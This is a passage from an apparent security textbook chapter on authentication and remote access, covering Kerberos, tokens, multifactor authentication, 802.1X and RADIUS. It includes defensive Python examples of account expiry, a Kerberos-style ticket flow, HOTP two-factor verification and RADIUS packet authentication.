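    if acct.expires is not None and today >= acct.expires:
        return "expired"
    if (acct.last_logon is not None
            and today - acct.last_logon > timedelta(days=inactivity_days)):
        return "inactive"
    return "active"


def can_log_on(acct: Account, today: date) -> bool:
    return account_state(acct, today) == "active"


def extend_expiration(acct: Account, new_expiry: date, today: date) -> None:
    """Administrator action: the only way an expired account becomes usable again."""
    if new_expiry <= today:
        raise ValueError("new expiration date must be in the future")
    acct.expires = new_expiry


def demo() -> List[str]:
    """Constructed accounts: a contractor expiring 2016-06-30 and a stale account."""
    contractor = Account("contractor", expires=date(2016, 6, 30), last_logon=date(2016, 6, 1))
    stale = Account("stale", last_logon=date(2016, 1, 1))
    out = [account_state(contractor, date(2016, 6, 29)),
           account_state(contractor, date(2016, 6, 30))]
    extend_expiration(contractor, date(2016, 9, 30), date(2016, 6, 30))
    out.append(account_state(contractor, date(2016, 6, 30)))
    out.append(account_state(stale, date(2016, 3, 1)))   # 60 days unused
    out.append(account_state(stale, date(2016, 6, 1)))   # 152 days unused
    return out


if __name__ == "__main__":
    print(demo())
```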
Tech Tip
Disabling Accounts
When an administrator needs to end a user's access, for instance upon termination, there are several options. The best option is to disable the account but leave it in the system. This preserves account permission chains and prevents reuse of a user ID, which could otherwise lead to confusion later when examining logs.
Similarly, organizations must define whether accounts are deleted or disabled when no longer needed. Deleting an account removes the account from the system permanently, whereas disabling an account leaves it in place but marks it as unusable. Many organizations disable accounts for a period of time after an employee departs (30 or more days) prior to deleting the account. This prevents anyone from using the account and allows administrators to reassign files, forward mail, and "clean up" before taking any permanent actions on the account.
Preventing Data Loss or Theft
Identity theft and commercial espionage have become very large and lucrative criminal enterprises over the past decade. Hackers are no longer merely content to compromise systems and deface websites. In many attacks performed today, hackers are after intellectual property, business plans, competitive intelligence, personal information, credit card numbers, client records, or any other information that can be sold, traded, or manipulated for profit. This has created a whole industry of technical solutions labeled data loss prevention (DLP) solutions. It can be assumed that a hacker has assumed the identity of an authorized user, and DLP solutions exist to prevent the exfiltration of data regardless of access control restrictions. DLP solutions come in many forms, and each of these solutions has strengths and weaknesses. The best solution is a combination of security elements, some to secure data in storage (encryption) and some in the form of monitoring (proxy devices to monitor data egress for sensitive data), and even NetFlow analytics to identify new bulk data transfer routes.
The Remote Access Process
The process of connecting by remote access involves two elements: a temporary network connection and a series of protocols to negotiate privileges and commands. The temporary network connection can occur via a dial-up service, the Internet, wireless access, or any other method of connecting to a network. Once the connection is made, the primary issue is authenticating the identity of the user and establishing proper privileges for that user. This is accomplished using a combination of protocols and the operating system on the host machine. The three steps in the establishment of proper privileges are authentication, authorization, and accounting, commonly referred to simply as AAA. Authentication is the matching of user-supplied credentials to previously stored credentials on a host machine, and it usually involves an account username and password. Once the user is authenticated, the authorization step takes place. Authorization is the granting of specific permissions based on the privileges held by the account. Does the user have permission to use the network at this time, or is her use restricted? Does the user have access to specific applications, such as mail and FTP, or are some of these restricted? These checks are carried out as part of authorization, and in many cases this is a function of the operating system in conjunction with its established security policies. Accounting is the collection of billing and other detail records. Network access is often a billable function, and a log of how much time, bandwidth, file transfer space, or other resources were used needs to be maintained. Other accounting functions include keeping detailed security logs to maintain an audit trail of tasks being performed.
Tech Tip
Securing Remote Connections
By using encryption, remote access protocols can securely authenticate and authorize a user according to previously established privilege levels. The authorization phase can keep unauthorized users out, but after that, encryption of the communications channel becomes very important in preventing nonauthorized users from breaking in on an authorized session and hijacking an authorized user's credentials. As more and more networks rely on the Internet for connecting remote users, the need for and importance of secure remote access protocols and secure communication channels will continue to grow.
When a user connects to the Internet through an ISP, this is similarly a case of remote access—the user is establishing a connection to her ISP's network, and the same security issues apply. The issue of authentication, the matching of user-supplied credentials to previously stored credentials on a host machine, is usually done via a user account name and password. Once the user is authenticated, the authorization step takes place. Remote authentication usually takes the common form of an end user submitting his credentials via an established protocol to a remote access server (RAS), which acts upon those credentials, either granting or denying access.
Access controls define what actions a user can perform or what objects a user is allowed to access. Access controls are built upon the foundation of elements designed to facilitate the matching of a user to a process. These elements are identification, authentication, and authorization. There are a myriad of details and choices associated with setting up remote access to a network, and to provide for the management of these options, it is important for an organization to have a series of remote access policies and procedures spelling out the details of what is permitted and what is not for a given network.
Identification
Identification is the process of ascribing a computer ID to a specific user, computer, network device, or computer process. The identification process is typically performed only once, when a user ID is issued to a particular user. User identification enables authentication and authorization to form the basis for accountability. For accountability purposes, user IDs should not be shared, and for security purposes, they should not be descriptive of job function. This practice enables you to trace activities to individual users or computer processes so that they can be held responsible for their actions. Identification links the logon ID or user ID to credentials that have been submitted previously to either HR or the IT staff. A required characteristic of user IDs is that they must be unique so that they map back to the credentials presented when the account was established.
Tech Tip
Federation
Federated identity management is an agreement between multiple enterprises that lets parties use the same identification data to obtain access to the networks of all enterprises in the group. This federation enables access to be managed across multiple systems in common trust levels.
Authentication
Authentication is the process of binding a specific ID to a specific computer connection. Two items need to be presented to cause this binding to occur—the user ID, and some "secret" to prove that the user is the valid possessor of the credentials. Historically, three categories of secrets are used to authenticate the identity of a user: what users know, what users have, and what users are. Today an additional category is used: what users do. These methods can be used individually or in combination. These controls assume that the identification process has been completed and the identity of the user has been verified. It is the job of authentication mechanisms to ensure that only valid users are admitted. Described another way, authentication is using some mechanism to prove that you are who you claimed to be when the identification process was completed. The most common method of authentication is the use of a password.
For greater security, you can add an element from a separate group, such as a smart card token—something a user has in her possession. Passwords are common because they are one of the simplest forms and use user memory as a prime component. Because of their simplicity, passwords have become ubiquitous across a wide range of authentication systems. Another method to provide authentication involves the use of something that only valid users should have in their possession. A physical-world example of this would be a simple lock and key. Only those individuals with the correct key will be able to open the lock and thus gain admittance to a house, car, office, or whatever the lock was protecting. A similar method can be used to authenticate users for a computer system or network (though the key may be electronic and could reside on a smart card or similar device). The problem with this technology, however, is that people do lose their keys (or cards), which means not only that the user can't log in to the system but that somebody else who finds the key may then be able to access the system, even though they are not authorized. To address this problem, a combination of the something-you-know and something-you-have methods is often used so that the individual with the key is also required to provide a password or passcode. The key is useless unless the user knows this code.
Tech Tip
Categories of Shared Secrets for Authentication
Originally published by the U.S. government in one of the "rainbow series" of manuals on computer security, the categories of shared "secrets" are
What users know (such as a password)
What users have (such as tokens)
What users are (static biometrics such as fingerprints or iris pattern)
Today, because of technological advances, a new category has emerged, patterned after subconscious behavior:
What users do (dynamic biometrics such as typing patterns or gait)
The third general method to provide authentication involves something that is unique about you. We are accustomed to this concept in our physical world, where our fingerprints or a sample of our DNA can be used to identify us. This same concept can be used to provide authentication in the computer world. The field of authentication that uses something about you or something that you are is known as biometrics. A number of different mechanisms can be used to accomplish this type of authentication, such as a fingerprint, iris, retinal, or hand geometry scan. All of these methods obviously require some additional hardware in order to operate. The inclusion of fingerprint readers on laptop computers is becoming common as the additional hardware is becoming cost effective. A new method, based on how users perform an action, such as their gait when walking or their typing patterns, has emerged as a source of a personal "signature." While not directly embedded into systems as yet, this is an option that will be coming in the future.
While the three main approaches to authentication appear to be easy to understand and in most cases easy to implement, authentication is not to be taken lightly, since it is such an important component of security. Potential attackers are constantly searching for ways to get past the system's authentication mechanism, and they have employed some fairly ingenious methods to do so. Consequently, security professionals are constantly devising new methods, building on these three basic approaches, to provide authentication mechanisms for computer systems and networks.
Basic Authentication
Basic authentication is the simplest technique used to manage access control across HTTP. Basic authentication operates by passing information encoded in Base64 form using standard HTTP headers. This is a plaintext method without any pretense of security. Figure 11.15 illustrates the operation of basic authentication.
• Figure 11.15 How basic authentication operates
Digest Authentication
Digest authentication is a method used to negotiate credentials across the Web. Digest authentication uses hash functions and a nonce to improve security over basic authentication. Digest authentication works as follows, as illustrated in Figure 11.16:
• Figure 11.16 How digest authentication operates
1. The client requests login.
2. The server responds with a challenge and provides a nonce.
3. The client hashes the password and nonce.
4. The client returns the hashed password to the server.
5. The server requests the password from a password store.
6. The server hashes the password and nonce.
7. If both hashes match, login is granted.
Digest authentication, although it improves security over basic authentication, does not provide any significant level of security. Passwords are not sent in the clear. Digest authentication is subject to man-in-the-middle attacks and potentially replay attacks.
Exam Tip: The bottom line for both basic and digest authentication is that these are insecure methods and should not be relied upon for any level of security.
Kerberos
Developed as part of MIT's project Athena, Kerberos is a network authentication protocol designed for a client/server environment. The current version is Kerberos 5 release 1.13.2 and is supported by all major operating systems. Kerberos securely passes a symmetric key over an insecure network using the Needham-Schroeder symmetric key protocol. Kerberos is built around the idea of a trusted third party, termed a key distribution center (KDC), which consists of two logically separate parts: an authentication server (AS) and a ticket-granting server (TGS). Kerberos communicates via "tickets" that serve to prove the identity of users.
Exam Tip: Two tickets are used in Kerberos. The first is a ticket-granting ticket (TGT) obtained from the authentication server (AS). The TGT is presented to a ticket-granting server (TGS) when access to a server is requested and a client-to-server ticket is issued, granting access to the server. Typically both the AS and the TGS are logically separate parts of the key distribution center (KDC).
Taking its name from the three-headed dog of Greek mythology, Kerberos is designed to work across the Internet, an inherently insecure environment. Kerberos uses strong encryption so that a client can prove its identity to a server and the server can in turn authenticate itself to the client. A complete Kerberos environment is referred to as a Kerberos realm. The Kerberos server contains user IDs and hashed passwords for all users that will have authorizations to realm services. The Kerberos server also has shared secret keys with every server to which it will grant access tickets. The basis for authentication in a Kerberos environment is the ticket.
Tickets are used in a two-step process with the client. The first ticket is a ticket-granting ticket (TGT) issued by the AS to a requesting client. The client can then present this ticket to the Kerberos server with a request for a ticket to access a specific server. This client-to-server ticket (also called a service ticket) is used to gain access to a server's service in the realm. Since the entire session can be encrypted, this eliminates the inherently insecure transmission of items such as a password that can be intercepted on the network. Tickets are time-stamped and have a lifetime, so attempting to reuse a ticket will not be successful. Figure 11.17 details Kerberos operations.
• Figure 11.17 Kerberos operations
Tech Tip
Kerberos Authentication
Kerberos is a third-party authentication service that uses a series of tickets as tokens for authenticating users. The six steps involved are protected using strong cryptography:
The user presents his credentials and requests a ticket from the key distribution center (KDC).
The KDC verifies credentials and issues a ticket-granting ticket (TGT).
The user presents a TGT and request for service to the KDC.
The KDC verifies authorization and issues a client-to-server ticket (or service ticket).
The user presents a request and a client-to-server ticket to the desired service.
If the client-to-server ticket is valid, service is granted to the client.
To illustrate how the Kerberos authentication service works, think about the common driver's license. You have received a license that you can present to other entities to prove you are who you claim to be. Because other entities trust the state in which the license was issued, they will accept your license as proof of your identity. The state in which the license was issued is analogous to the Kerberos authentication service realm, and the license acts as a client-to-server ticket. It is the trusted entity both sides rely on to provide valid identifications. This analogy is not perfect, because we all probably have heard of individuals who obtained a phony driver's license, but it serves to illustrate the basic idea behind Kerberos.
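The six-step ticket flow from the Tech Tip, as an added example that is not from the book or from any Kerberos implementation: the AS exchange yields a TGT, the TGS exchange turns it into a client-to-server ticket under the target service's key, and the service accepts the ticket only while its lifetime has not elapsed. Two simplifications are made so the example runs with the standard library alone: tickets are integrity-protected with an HMAC under the recipient's shared key rather than encrypted, and the client's long-term key is a hash of its password. The realm keys, principal names, and the integer timestamps are constructed.

```python
# Added example (not from the book): a simplified Kerberos-style exchange with
# an AS/TGS (the KDC) and a service, showing both tickets and the lifetime check.
# Simplification: tickets are HMAC-sealed under the recipient's key, not encrypted.
import hashlib
import hmac
import json
from typing import Any, Dict

Ticket = Dict[str, str]


def derive_key(password: str) -> bytes:
    """Simplified long-term key derived from the user's password (constructed)."""
    return hashlib.sha256(password.encode()).digest()


# Keys the KDC shares with each principal in the realm (constructed).
REALM_KEYS: Dict[str, bytes] = {
    "alice": derive_key("alice-password"),
    "krbtgt": b"ticket-granting-server-key",
    "fileserver": b"fileserver-key",
    "mail": b"mail-server-key",
}


def seal(key: bytes, fields: Dict[str, Any]) -> Ticket:
    """Bind the ticket contents to the key only the intended recipient holds."""
    body = json.dumps(fields, sort_keys=True)
    return {"body": body, "tag": hmac.new(key, body.encode(), hashlib.sha256).hexdigest()}


def unseal(key: bytes, ticket: Ticket, now: int) -> Dict[str, Any]:
    """Reject tickets sealed for another key and tickets outside their lifetime."""
    expected = hmac.new(key, ticket["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, ticket["tag"]):
        raise ValueError("ticket was not issued for this key")
    fields = json.loads(ticket["body"])
    if not fields["issued"] <= now < fields["expires"]:
        raise ValueError("ticket outside its lifetime")
    return fields


class KDC:
    def authenticate(self, client: str, client_key: bytes, now: int, lifetime: int = 600) -> Ticket:
        """Steps 1 and 2 (AS exchange): valid credentials yield a TGT sealed under the TGS key."""
        if not hmac.compare_digest(REALM_KEYS.get(client, b""), client_key):
            raise ValueError("bad credentials")
        return seal(REALM_KEYS["krbtgt"], {"client": client, "service": "krbtgt",
                                            "issued": now, "expires": now + lifetime})

    def service_ticket(self, tgt: Ticket, service: str, now: int, lifetime: int = 300) -> Ticket:
        """Steps 3 and 4 (TGS exchange): a valid TGT yields a ticket under the service's key."""
        fields = unseal(REALM_KEYS["krbtgt"], tgt, now)
        return seal(REALM_KEYS[service], {"client": fields["client"], "service": service,
                                          "issued": now, "expires": now + lifetime})


class Service:
    def __init__(self, name: str) -> None:
        self.name = name

    def accept(self, ticket: Ticket, now: int) -> str:
        """Steps 5 and 6: grant service for a ticket sealed under this service's key and still valid."""
        fields = unseal(REALM_KEYS[self.name], ticket, now)
        if fields["service"] != self.name:
            raise ValueError("ticket is for another service")
        return fields["client"]


if __name__ == "__main__":
    kdc = KDC()
    tgt = kdc.authenticate("alice", derive_key("alice-password"), now=1000)
    st = kdc.service_ticket(tgt, "fileserver", now=1100)
    print("fileserver granted access to:", Service("fileserver").accept(st, now=1200))
    try:
        Service("fileserver").accept(st, now=1500)   # past the 300-second lifetime
    except ValueError as e:
        print("rejected:", e)
```

Two properties of the real protocol survive the simplification: the password never crosses the network (only a key derived from it is used locally to prove identity to the AS), and a ticket for the file server is useless at the mail server because it was sealed under a different shared key.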
Certificates
Certificates are a method of establishing authenticity of specific objects such as an individual's public key or downloaded software. A digital certificate is a digital file that is sent as an attachment to a message and is used to verify that the message did indeed come from the entity it claims to have come from. Digital certificates are covered in detail in Chapter 6.
Cross Check
Digital Certificates and Digital Signatures
Kerberos uses tickets to convey messages. Part of the ticket is a certificate that contains the requisite keys. Understanding how certificates convey this vital information is an important part of understanding how Kerberos-based authentication works. Certificates and how they are used were covered in Chapter 6, with the protocols associated with PKI covered in Chapter 7. Refer back to these chapters as needed.
Tokens
A token is a hardware device that can be used in a challenge/response authentication process. In this way, it functions as both a something-you-have and something-you-know authentication mechanism. Several variations on this type of device exist, but they all work on the same basic principles. Tokens were described earlier in the chapter, and are commonly employed in remote authentication schemes as they provide additional surety of the identity of the user, even users who are somewhere else and cannot be observed.
Exam Tip: The use of a token is a common method of using "something you have" for authentication. A token can hold a cryptographic key or act as a one-time password (OTP) generator. It can also be a smart card that holds a cryptographic key (examples include the U.S. military Common Access Card and the Federal Personal Identity Verification [PIV] card). These devices can be safeguarded using a PIN and lockout mechanism to prevent use if stolen.
Multifactor
Multifactor authentication is a term that describes the use of more than one authentication mechanism at the same time. An example of this is the hardware token, which requires both a personal ID number (PIN) or password and the device itself to determine the correct response in order to authenticate to the system. This means that both the something-you-have and something-you-know mechanisms are used as factors in verifying authenticity of the user. Biometrics are also often used in conjunction with a PIN so that they, too, can be used as part of a multifactor authentication scheme, in this case something you are as well as something you know. The purpose of multifactor authentication is to increase the level of security, since more than one mechanism would have to be spoofed in order for an unauthorized individual to gain access to a computer system or network. The most common example of multifactor security is the common ATM card most of us carry in our wallets. The card is associated with a PIN that only the authorized cardholder should know. Knowing the PIN without having the card is useless, just as having the card without knowing the PIN will also not provide you access to your account.
Exam Tip: The required use of more than one authentication system is known as multifactor authentication. The most common example is the combination of a password with a hardware token. For high security, three factors can be used: password, token, and biometric.
Multifactor authentication is sometimes referred to as two-factor authentication or three-factor authentication, referring to the number of different factors used. It is important to note that this implies separate factors for the authentication element; a user ID and password are not two factors, as the user ID is not a shared secret element.
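A server-side verifier for the PIN-plus-token combination the Tokens and Multifactor sections describe, as an added example that is not from the book: the PIN is something the user knows, the one-time code is produced by a token (something the user has), and a logon succeeds only if both check out. The token algorithm is HOTP from RFC 4226, so the codes can be checked against that RFC's published test vectors; the PIN hashing, the three-failure lockout and the five-code look-ahead window are choices made for this example, and the PIN and token secret are the constructed sample values shown.

```python
# Added example (not from the book): verifying a two-factor logon where the
# user supplies a PIN (something you know) and a code from an OTP token
# (something you have). Token algorithm: HOTP, RFC 4226.
import hashlib
import hmac
import os
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP value for a counter: HMAC-SHA1 with RFC 4226 dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class TwoFactorVerifier:
    """Holds one user's PIN hash and token secret; both factors are required."""

    def __init__(self, pin: str, token_secret: bytes,
                 max_failures: int = 3, window: int = 5) -> None:
        self.salt = os.urandom(16)
        self.pin_hash = self._hash_pin(pin)
        self.token_secret = token_secret
        self.counter = 0            # next counter value the server expects
        self.failures = 0
        self.max_failures = max_failures
        self.window = window        # look-ahead for codes generated but never submitted

    def _hash_pin(self, pin: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", pin.encode(), self.salt, 100_000)

    def locked(self) -> bool:
        """Lockout after repeated failures, the safeguard the text mentions for stolen tokens."""
        return self.failures >= self.max_failures

    def verify(self, pin: str, code: str) -> bool:
        """Succeed only if the PIN matches and the code is a fresh token output."""
        if self.locked():
            return False
        pin_ok = hmac.compare_digest(self._hash_pin(pin), self.pin_hash)
        matched = None
        for c in range(self.counter, self.counter + self.window):
            if hmac.compare_digest(hotp(self.token_secret, c), code):
                matched = c
                break
        if not (pin_ok and matched is not None):
            self.failures += 1
            return False
        self.counter = matched + 1  # move past the used code so it cannot be replayed
        self.failures = 0
        return True


if __name__ == "__main__":
    # RFC 4226 test secret; the PIN is a constructed sample value.
    verifier = TwoFactorVerifier("4921", b"12345678901234567890")
    print(verifier.verify("4921", hotp(b"12345678901234567890", 0)))  # both factors: True
    print(verifier.verify("4921", hotp(b"12345678901234567890", 0)))  # replayed code: False
```

Knowing the PIN without the token fails because the code cannot be produced, and holding the token without the PIN fails and counts toward lockout, which mirrors the ATM-card example in the text.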
Mutual Authentication
Mutual authentication describes a process in which each side of an electronic communication verifies the authenticity of the other. We are accustomed to the idea of having to authenticate ourselves to our ISP before we access the Internet, generally through the use of a user ID/password pair, but how do we actually know that we are really communicating with our ISP and not some other system that has somehow inserted itself into our communication (a man-in-the-middle attack)? Mutual authentication provides a mechanism for each side of a client/server relationship to verify the authenticity of the other to address this issue. A common method of performing mutual authentication involves using a secure connection, such as Transport Layer Security (TLS), to the server and a one-time password generator that then authenticates the client.
MutualTLS–basedauthenticationprovidesthesamefunctionsasnormalTLS,withtheadditionofauthenticationandnonrepudiationoftheclient.Thissecondauthentication,theauthenticationoftheclient,isdoneinthesamemannerasthenormalserverauthenticationusingdigitalsignatures.Theclientauthenticationrepresentsthemanysidesofamany-to-onerelationship.MutualTLSauthenticationisnotcommonlyusedbecauseofthecomplexity,cost,andlogisticsassociatedwithmanagingthemultitudeofclientcertificates.Thisreducestheeffectiveness,andmostwebapplicationsarenotdesignedtorequireclient-sidecertificates.
Authorization
Authorization is the process of permitting or denying access to a specific resource. Once identity is confirmed via authentication, specific actions can be authorized or denied. Many types of authorization schemes are used, but the purpose is the same: determine whether a given user who has been identified has permissions for a particular object or resource being requested. This functionality is frequently part of the operating system and is transparent to users. The separation of tasks, from identification to authentication to authorization, has several advantages. Many methods can be used to perform each task, and on many systems several methods are concurrently present for each task. Separation of these tasks into individual elements allows combinations of implementations to work together. Any system or resource, be it hardware (router or workstation) or a software component (database system), that requires authorization can use its own authorization method once authentication has occurred. This makes for efficient and consistent application of these principles.
Access Control
The term access control has been used to describe a variety of protection schemes. It sometimes refers to all security features used to prevent unauthorized access to a computer system or network—or even a network resource such as a printer. In this sense, it may be confused with authentication. More properly, access is the ability of a subject (such as an individual or a process running on a computer system) to interact with an object (such as a file or hardware device). Once the individual has verified their identity, access controls regulate what the individual can actually do on the system. Just because a person is granted entry to the system, that does not mean that they should have access to all data the system contains.
Tech Tip
Access Control vs. Authentication
It may seem that access control and authentication are two ways to describe the same protection mechanism. This, however, is not the case. Authentication provides a way to verify to the computer who the user is. Once the user has been authenticated, the access controls decide what operations the user can perform. The two go hand-in-hand but are not the same thing.
Remote Access Methods
When a user requires access to a remote system, the process of remote access is used to determine the appropriate controls. This is done through a series of protocols and processes described in the remainder of this chapter.
IEEE 802.1X
IEEE 802.1X is an authentication standard that supports port-based authentication services between a user and an authorization device, such as an edge router. IEEE 802.1X is used by all types of networks, including Ethernet, Token Ring, and wireless. This standard describes methods used to authenticate a user prior to granting access to a network and the authentication server, such as a RADIUS server. 802.1X acts through an intermediate device, such as an edge switch, enabling ports to carry normal traffic if the connection is properly authenticated. This prevents unauthorized clients from accessing the publicly available ports on a switch, keeping unauthorized users out of a LAN. Until a client has successfully authenticated itself to the device, only Extensible Authentication Protocol over LAN (EAPOL) traffic is passed by the switch.
One security issue associated with 802.1X is that the authentication occurs only upon initial connection, and that another user can insert themselves into the connection by changing packets or using a hub. The secure solution is to pair 802.1X, which authenticates the initial connection, with a VPN or IPsec, which provides persistent security.
EAPOL is an encapsulated method of passing EAP messages over 802.1 frames. EAP is a general protocol that can support multiple methods of authentication, including one-time passwords, Kerberos, public keys, and security device methods such as smart cards. Once a client successfully authenticates itself to the 802.1X device, the switch opens ports for normal traffic. At this point, the client can communicate with the system's AAA method, such as a RADIUS server, and authenticate itself to the network.
Wireless Protocols
802.1X is commonly used on wireless access points as a port-based authentication service prior to admission to the wireless network. 802.1X over wireless uses either 802.11i or EAP-based protocols, such as EAP-TLS or PEAP-TLS.
Cross Check
Wireless Remote Access
Wireless is a common method of allowing remote access to a network, as it does not require physical cabling and allows mobile connections. Wireless security, including protocols such as 802.11i and EAP-based solutions, is covered in Chapter 12.
RADIUS
Remote Authentication Dial-In User Service (RADIUS) is an AAA protocol. It was submitted to the Internet Engineering Task Force (IETF) as a series of RFCs: RFC 2058 (RADIUS specification), RFC 2059 (RADIUS accounting standard), and updated RFCs 2865–2869, which are now standard protocols. RADIUS is designed as a connectionless protocol that uses the User Datagram Protocol (UDP) as its transport layer protocol. Connection type issues, such as timeouts, are handled by the RADIUS application instead of the transport layer. RADIUS utilizes UDP port 1812 for authentication and authorization and UDP 1813 for accounting functions.
RADIUS is a client/server protocol. The RADIUS client is typically a network access server (NAS). Network access servers act as intermediaries, authenticating clients before allowing them access to a network. RADIUS, RRAS (Microsoft), RAS, and VPN servers can all act as network access servers. The RADIUS server is a process or daemon running on a UNIX or Windows Server machine. Communications between a RADIUS client and RADIUS server are encrypted using a shared secret that is manually configured into each entity and not shared over a connection. Hence, communications between a RADIUS client (typically a NAS) and a RADIUS server are secure, but the communications between a user (typically a PC) and the RADIUS client are subject to compromise. This is important to note, for if the user's machine (the PC) is not the RADIUS client (the NAS), then communications between the PC and the NAS are typically not encrypted and are passed in the clear.
RADIUS Authentication
The RADIUS protocol is designed to allow a RADIUS server to support a wide variety of methods to authenticate a user. When the server is given a username and password, it can support Point-to-Point Protocol (PPP), Password Authentication Protocol (PAP), Challenge-Handshake Authentication Protocol (CHAP), UNIX login, and other mechanisms, depending on what was established when the server was set up. A user login authentication consists of a query (Access-Request) from the RADIUS client and a corresponding response (Access-Accept, Access-Challenge, or Access-Reject) from the RADIUS server, as you can see in Figure 11.18. The Access-Challenge response is the initiation of a challenge/response handshake. If the client cannot support challenge/response, then it treats the Challenge message as an Access-Reject.
• Figure 11.18 RADIUS communication sequence
The Access-Request message contains the username, encrypted password, NAS IP address, and port. The message also contains information concerning the type of session the user wants to initiate. Once the RADIUS server receives this information, it searches its database for a match on the username. If a match is not found, either a default profile is loaded or an Access-Reject reply is sent to the user. If the entry is found or the default profile is used, the next phase involves authorization, for in RADIUS, these steps are performed in sequence. Figure 11.18 shows the interaction between a user and the RADIUS client and RADIUS server and the steps taken to make a connection.
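The Access-Request/Access-Accept exchange above, worked through in code as an added example that is not from the book: it builds the request the way RFC 2865 does, hiding the User-Password attribute with the shared secret and the 16-byte Request Authenticator, and has the NAS verify the server's reply through the Response Authenticator, which only a holder of the secret can compute. The secret, user database, and NAS address are constructed values.

```python
import hashlib
import hmac
import os
import struct

# Constructed shared secret for this example; a real NAS and RADIUS server
# each have it configured locally and it never crosses the network.
SHARED_SECRET = b"example-radius-secret"

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_NAS_IP, ATTR_NAS_PORT = 1, 2, 4, 5


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 section 5.2: pad the password to 16-byte blocks and XOR each
    block with MD5(secret + previous block); the 'previous block' of the first
    block is the 16-byte Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        b = hashlib.md5(secret + prev).digest()
        c = bytes(x ^ y for x, y in zip(padded[i:i + 16], b))
        out, prev = out + c, c
    return out


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Server-side inverse of hide_password; strips the NUL padding."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        b = hashlib.md5(secret + prev).digest()
        c = hidden[i:i + 16]
        out, prev = out + bytes(x ^ y for x, y in zip(c, b)), c
    return out.rstrip(b"\x00")


def encode_attrs(attrs) -> bytes:
    # Each attribute is Type (1 byte), Length (1 byte, includes these two), Value.
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)


def parse_packet(pkt: bytes):
    """Split a RADIUS packet into (code, identifier, authenticator, {type: value})."""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    authenticator, attrs, i = pkt[4:20], {}, 20
    while i < length:
        t, l = pkt[i], pkt[i + 1]
        if l < 2:
            raise ValueError("malformed attribute")
        attrs[t] = pkt[i + 2:i + l]
        i += l
    return code, ident, authenticator, attrs


def build_access_request(identifier, username, password, nas_ip, nas_port, secret,
                         authenticator=None) -> bytes:
    """NAS side: Access-Request carrying the hidden User-Password."""
    if authenticator is None:
        authenticator = os.urandom(16)   # fresh and unpredictable per request
    attrs = encode_attrs([
        (ATTR_USER_NAME, username),
        (ATTR_USER_PASSWORD, hide_password(password, secret, authenticator)),
        (ATTR_NAS_IP, nas_ip),
        (ATTR_NAS_PORT, struct.pack("!I", nas_port)),
    ])
    head = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs))
    return head + authenticator + attrs


def build_response(code: int, request: bytes, secret: bytes, attrs: bytes = b"") -> bytes:
    """Server side: Response Authenticator =
    MD5(Code + ID + Length + RequestAuth + Attributes + Secret) (RFC 2865 section 3)."""
    _, ident, request_auth, _ = parse_packet(request)
    head = struct.pack("!BBH", code, ident, 20 + len(attrs))
    resp_auth = hashlib.md5(head + request_auth + attrs + secret).digest()
    return head + resp_auth + attrs


def verify_response(response: bytes, request: bytes, secret: bytes) -> bool:
    """NAS side: the reply must match the request's identifier and carry an
    authenticator only a holder of the shared secret could compute."""
    _, ident, request_auth, _ = parse_packet(request)
    head, resp_auth, attrs = response[:4], response[4:20], response[20:]
    if response[1] != ident:
        return False
    expected = hashlib.md5(head + request_auth + attrs + secret).digest()
    return hmac.compare_digest(resp_auth, expected)


def server_handle(request: bytes, secret: bytes, user_db: dict) -> bytes:
    """Server: recover the password with the shared secret, then decide."""
    code, _, authenticator, attrs = parse_packet(request)
    user = attrs.get(ATTR_USER_NAME, b"")
    pw = reveal_password(attrs.get(ATTR_USER_PASSWORD, b""), secret, authenticator)
    if code == ACCESS_REQUEST and user in user_db and hmac.compare_digest(user_db[user], pw):
        return build_response(ACCESS_ACCEPT, request, secret)
    return build_response(ACCESS_REJECT, request, secret)
```

Note that this protection covers only the NAS-to-server leg, as the section says; the user's password still reaches the NAS by whatever the access protocol (PAP, CHAP, EAP) provides.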
RADIUS Authorization
In the RADIUS protocol, the authentication and authorization steps are performed together in response to a single Access-Request message, although they are sequential steps (see Figure 11.18). Once an identity has been established, either known or default, the authorization process determines what parameters are returned to the client. Typical authorization parameters include the service type allowed (shell or framed), the protocols allowed, the IP address to assign to the user (static or dynamic), and the access list to apply or static route to place in the NAS routing table.
Tech Tip
Shell Accounts
Shell account requests are those that desire command-line access to a server. Once authentication is successfully performed, the client is connected directly to the server so command-line access can occur. Rather than being given a direct IP address on the network, the NAS acts as a pass-through device conveying access.
These parameters are all defined in the configuration information on the RADIUS client and server during setup. Using this information, the RADIUS server returns an Access-Accept message with these parameters to the RADIUS client.
RADIUS Accounting
The RADIUS accounting function is performed independently of RADIUS authentication and authorization. The accounting function uses a separate UDP port, 1813 (see Table 11.2 in the “Connection Summary” section at the end of the chapter). The primary functionality of RADIUS accounting was established to support ISPs in their user accounting, and it supports typical accounting functions for time billing and security logging. The RADIUS accounting functions are designed to allow data to be transmitted at the beginning and end of a session, and they can indicate resource utilization, such as time, bandwidth, and so on.
Table 11.2 Common TCP/UDP Remote Access Networking Port Assignments
Diameter
Diameter is the name of an AAA protocol suite, designated by the IETF to replace the aging RADIUS protocol. Diameter operates in much the same way as RADIUS in a client/server configuration, but it improves upon RADIUS, resolving discovered weaknesses. Diameter is a TCP-based service and has more extensive AAA capabilities. Diameter is also designed for all types of remote access, not just modem pools. As more and more users adopt broadband and other connection methods, these newer services require more options to determine permissible usage properly and to account for and log the usage. Diameter is designed with these needs in mind. Diameter also has an improved method of encrypting message exchanges to prohibit replay and man-in-the-middle attacks. Taken all together, Diameter, with its enhanced functionality and security, is an improvement on the proven design of the old RADIUS standard.
TACACS+
